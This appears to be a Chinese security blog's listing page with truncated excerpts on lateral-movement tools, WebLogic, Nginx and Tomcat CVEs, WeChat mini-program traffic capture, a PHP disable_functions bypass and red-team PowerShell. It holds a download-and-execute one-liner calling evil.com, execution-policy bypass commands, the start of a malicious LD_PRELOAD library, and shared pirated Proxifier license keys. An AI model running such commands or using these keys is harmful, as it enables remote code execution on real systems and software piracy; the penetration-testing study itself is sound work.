以下是 psexec、smbexec、wmiexec、evil-winrm 和 dcomexec 横向移动工具的对比及其适用场景分析:
1. PsExec核心特点
协议与端口:基于 SMB(TCP 445)和 RPC(TCP 135)协议,需上传可执行文件到目标主机并创建服务。
隐蔽性:较低,文件上传和服务创建行为易被安全监控发现。
权限要求:需管理员权限,执行后默认以 SYSTEM 权限运行。
适用场景
目标环境开放 SMB 服务:适合内网中 SMB 端口(445)开放且未严格监控的环境。
批量管理或部署:例如在多台主机上执行相同命令或部署软件。
快速提权:通过 SYSTEM 权限执行敏感操作(如添加用户、修改注册表)。
2. SMBexec核心特点
协议与端口:同样依赖 SMB(TCP 445),但无需上传文件,直接通过共享资源(如 ADMIN$)执行命令。
隐蔽性:高于 PsExec,避免文件残留和服务创建,减少检测风险。
权限要求:需要共享资源的访问权限,通常需管理员权限。
适用场景
隐蔽横向移动:适合需要绕过传统文件检测的场景。
共享环境渗透:在目标主机共享权限宽松 ...
网络安全
未读常见漏洞以下是WebLogic常见的安全漏洞列表,按类型和影响分类:
1. 反序列化漏洞
CVE-2017-3506
描述:XMLDecoder反序列化漏洞,允许远程代码执行(RCE)。
影响:攻击者通过构造恶意XML数据执行任意命令。
CVE-2017-10271
描述:CVE-2017-3506的补丁绕过,同样通过XMLDecoder触发RCE。
CVE-2019-2725
描述:WebLogic wls9-async组件反序列化漏洞,影响Oracle WebLogic 10.3.6.0及12.1.3.0版本。
CVE-2020-2551
描述:通过IIOP协议的反序列化漏洞,攻击者可在未授权下远程执行代码。
CVE-2020-14882和CVE-2020-14883
描述:通过14882控制台未授权绕过,再结合14883的远程加载xml文件实现RCE
CVE-2023-21839(历史补丁关联)
背景:2023年未完全修复的漏洞,后续引发 CVE-2024-20931。
影响:通过 T3 协议远程执行代码,需结合后续补丁彻底修复
...
1.禅道简介禅道(ZenTao)是一款开源的项目管理软件,专注于敏捷开发团队的需求,支持Scrum、看板等敏捷方法,同时融合了传统项目管理的功能模块。它由中国的禅道团队开发,广泛应用于软件开发、互联网产品研发等领域。
核心功能模块
产品管理
管理产品需求(用户故事)、版本规划、路线图。
支持需求优先级排序、分解任务。
项目管理
支持Scrum(迭代、冲刺)和看板(Kanban)模式。
分配任务、跟踪进度、燃尽图统计。
质量管理
用例管理、缺陷跟踪(Bug提交、指派、修复验证)。
支持测试套件和自动化测试集成。
文档管理
共享项目文档、知识库,支持版本控制。
团队协作
任务讨论、动态订阅、工时记录、甘特图。
统计报表
生成进度、效率、缺陷分布等可视化报表。
技术架构
开源版本:基于PHP + MySQL开发,支持自主部署到服务器。
企业版:提供SaaS云服务(免部署)、技术支持及高级功能(如OA审批、自定义工作流)。
版本类型
开源版
免费使用,功能完整,适合中小团队或技术能力较强的企业。
需自行维护和部署。
企业版
...
一.PC抓包
使用proxifier将WX小程序的的包进行代理转发到BP。
1. 下载Proxifier
下载proxifier,正规发布软件,因此谷歌搜索下载就行了。
下载后可使用以下注册码进行注册
123L6Z8A-XY2J4-BTZ3P-ZZ7DF-A2Q9C(Windows Portable Edition)5EZ8G-C3WL5-B56YG-SCXM9-6QZAP(Windows Standard Edition)P427L-9Y552-5433E-8DSR3-58Z68(MAC)
2. 配置代理应用和代理地址
先配置代理到BP端口
配置需要代理的应用
取消默认的代理规则,添加新的代理规则
设置代理规则名,设置需要代理的应用,设置代理行为。
代理的应用微信扩展应用
微信扩展应用地址可通过任务管理器查找
打开对应的小程序就可以看到对应的子进程记录
打开BP也能看到对应小程序的包。
二.强制开启开发者模式
利用开源工具WeChatOpenDevTool同时下载匹配版本的微信对其进行hook注入,实现打开开发者模式,使用断点调试 ...
网络安全
未读以下是Nginx常见的历史漏洞及配置错误导致的安全问题,按类型和影响分类整理:
一、解析类漏洞
文件名逻辑漏洞(CVE-2013-4547)
影响版本:Nginx 0.8.411.4.3 / 1.5.01.5.7
原理:错误解析URI中的空格(0x20)和空字节(0x00),导致攻击者可通过构造文件名(如1.jpg[空格][空字节].php)绕过安全检查,使非PHP文件被解析为PHP执行。
利用场景:上传恶意文件后,通过修改请求头触发解析漏洞。
配置不当导致的PHP解析漏洞
影响范围:与Nginx和PHP版本无关,因cgi.fix_pathinfo默认开启(值为1)。
原理:Nginx将.php结尾的请求直接转发给PHP处理,即使文件路径中.php部分不存在。例如,访问/test.jpg/.php时,test.jpg会被当作PHP解析。
%00截断解析漏洞
影响版本:Nginx 0.5.x、0.6.x、0.7≤0.7.65、0.8≤0.8.37
原理:利用URL中的空字节(%00)截断路径解析,例如访问/test.jpg%00.php,使 ...
一.HTTPS SSL/TLSHTTPS通过SSL/TLS协议实现安全通信,其核心在于握手阶段的加密协商和密钥交换,随后使用对称加密传输数据。以下是详细的流程和加密原理:
TLS1.2 密钥协商流程
ClientHello
客户端向服务器发送支持的TLS版本、可用加密套件列表(如TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256)及一个客户端随机数(Client Random)。
ServerHello
服务器选择TLS版本、加密套件,并生成服务器随机数(Server Random),返回给客户端。
证书与密钥交换参数
证书传输:服务器发送数字证书(包含公钥和CA签名),客户端验证证书的合法性(CA信任链、有效期、域名匹配等)。
ServerKeyExchange(可选):若使用ECDHE等算法,服务器发送临时公钥参数(如椭圆曲线参数)和签名,确保参数未被篡改。
ServerHelloDone:通知客户端初始握手信息发送完毕。
客户端密钥交换
验证证书:客户端验证服务器证书后,生成预主密钥 ...
网络安全
未读以下是Tomcat中间件的主要安全漏洞及其详细信息,基于公开披露的CVE编号和漏洞报告整理:
Tomcat常见漏洞汇总1. 远程代码执行漏洞(CVE-2025-24813)
影响版本:Apache Tomcat 9.0.0-M1 至 9.0.98Apache Tomcat 10.1.0-M1 至 10.1.34Apache Tomcat 11.0.0-M1 至 11.0.2
漏洞原理:默认Servlet的写入功能启用后(默认禁用),攻击者可通过部分PUT请求上传恶意序列化会话文件,结合Tomcat的基于文件会话持久化机制触发反序列化,实现远程代码执行(RCE)或信息泄露。
修复建议:升级至Tomcat 9.0.99、10.1.35或11.0.3。
关键词:PUT文件上传、反序列化
2. PUT方法任意文件写入漏洞(CVE-2017-12615)
影响版本:Apache Tomcat 7.0.0 – 7.0.81Apache Tomcat 8.5.19(部分配置下)
漏洞原理:若web.xml中readonly参数设置为false,攻击者可通过PUT请求上传恶意JSP文 ...
以下是绕过 PHP disable_functions 限制的完整方案,逐步说明如何在内网攻击中实现网络请求:
绕过 disable_functions 的终极方案1. 确认禁用函数列表首先通过 phpinfo() 或以下脚本获取被禁用的函数:
12<?phpecho "禁用函数:" . ini_get('disable_functions');
2. 基于可用函数的绕过方法根据未被禁用的函数选择对应策略:
方案一:利用 LD_PRELOAD + mail() 组合适用条件:
mail() 函数可用
可上传 .so 文件(Linux)或编写自定义库
步骤:
编写恶意共享库(bypass.c):
12345678910111213141516171819202122232425#include <stdlib.h>#include <stdio.h>#include <sys/socket.h>#include <netinet/in.h>#include <arpa/ine ...
网络安全
未读1.环境安装1.1.PHP+IDE安装
Windows-php下载地址。
配置环境变量。
安装PHPSTORM
配置项目解释器
1.2.Composer安装
Composer下载
设置国内镜像
1composer config -g repo.packagist composer https://mirrors.aliyun.com/composer/
可能遇到composer ssl问题,在ini中添加openssl扩展extension=openssl
创建thinkphp项目
1composer create-project topthink/think=6.0.* tp60 --ignore-platform-reqs
1.3.Xdebug安装
下载Xdebug
配置Xdebug
配置php.ini文件
123456789101112131415[Xdebug]zend_extension=D:/Language/PHP/php7.3.4nts/ext/php_xdebug.dll ;下载的对应版本的Xdebug文件xdebug.collect_pa ...
网络安全
未读在渗透测试红队中,PowerShell 是一个强大的工具,因其深度集成于 Windows 系统且灵活性高,常用于信息收集、权限提升、横向移动和持久化攻击。以下是 PowerShell 的基础知识和红队常用技巧:
一、红队PowerShell1. PowerShell 基础基本概念
**PowerShell (PS)**:基于 .NET 的脚本语言和命令行工具,支持自动化任务和系统管理。
Cmdlet:PowerShell 内置命令(如 Get-Process、Copy-Item)。
脚本文件:扩展名为 .ps1,可通过命令行执行。
执行策略:控制脚本运行权限,默认限制严格(Restricted)。
常用命令
执行脚本:powershell -ExecutionPolicy Bypass -File script.ps1
绕过执行策略:1powershell -ep bypass
远程下载并执行:1IEX (New-Object Net.WebClient).DownloadString('http://evil.com/script.ps1')
2. 红队常 ...